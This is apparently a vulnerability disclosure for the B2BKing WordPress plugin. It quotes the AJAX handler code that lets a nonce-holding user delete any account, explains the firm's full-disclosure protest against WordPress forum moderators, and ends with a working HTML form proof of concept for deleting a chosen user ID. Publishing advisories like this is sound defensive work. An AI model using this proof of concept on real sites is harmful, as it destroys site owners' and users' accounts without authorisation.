Authenticated User Deletion Vulnerability in B2BKing
The WordPress plugin B2BKing contains an authenticated user deletion vulnerability.
The vulnerability involves the plugin’s function b2bkingrejectuser(), which can be found in the file /includes/class-b2bking.php. That is registered to be accessible through WordPress’ AJAX functionality (whether logged in to WordPress or not):
108 109 | add_action( 'wp_ajax_b2bkingrejectuser', array($this, 'b2bkingrejectuser') ); add_action( 'wp_ajax_nopriv_b2bkingrejectuser', array($this, 'b2bkingrejectuser') ); |
That function allows deleting an arbitrary WordPress user specified by the POST input “user”. The only limitation is that a valid nonce, to prevent cross-site request forgery (CSRF), is checked for before that is done:
635 636 637 638 639 640 641 642 643 644 645 646 | function b2bkingrejectuser(){ // Check security nonce. if ( ! check_ajax_referer( 'b2bking_security_nonce', 'security' ) ) { wp_send_json_error( 'Invalid security token sent.' ); wp_die(); } // If nonce verification didn't fail, run further $user_id = sanitize_text_field($_POST['user']); // delete account wp_delete_user($user_id); |
That nonce is included on admin pages of WordPress, so that would required being logged in to WordPress (so it doesn’t make sense that the function is accessible to those not logged in). As the plugin extends WooCommerce, the ability to access the admin area should be further restricted according to the documentation from the developer of WooCommerce, Automattic, but there is currently an unaddressed bypass on that restriction.
WordPress Causes Full Disclosure
As a protest of the moderators of the WordPress Support Forum’s continued inappropriate behavior we changed from reasonably disclosing to full disclosing vulnerabilities for plugins in the WordPress Plugin Directory in protest, until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about that for the developer through the WordPress Support Forum. (For plugins that are also in the ClassicPress Plugin Directory, we will follow our reasonable disclosure policy.)
You can notify the developer of this issue on the forum as well.
After four years, the moderators have finally tacitly admitted they were behaving inappropriately and have made moves to fix the problems (though incompletely), so these full disclosures can be ended if they simply restore access to our accounts and plugins in the Plugin Directory. Hopefully that takes less than four years.
Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:
Proof of Concept
The following proof of concept causes the specified WordPress user to be deleted, when logged in to WordPress.
Make sure to replace “[path to WordPress]” with the location of WordPress, “[nonce]” with the value of security key found on the line beginning “var b2bking” in the source code of the admin dashboard, and “[user ID]” with the ID of the user to deleted.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=b2bkingrejectuser" method="POST"> <input type="hidden" name="security" value="[nonce]" /> <input type="hidden" name="user" value="[user ID]" /> <input type="submit" value="Submit" /> </form> </body>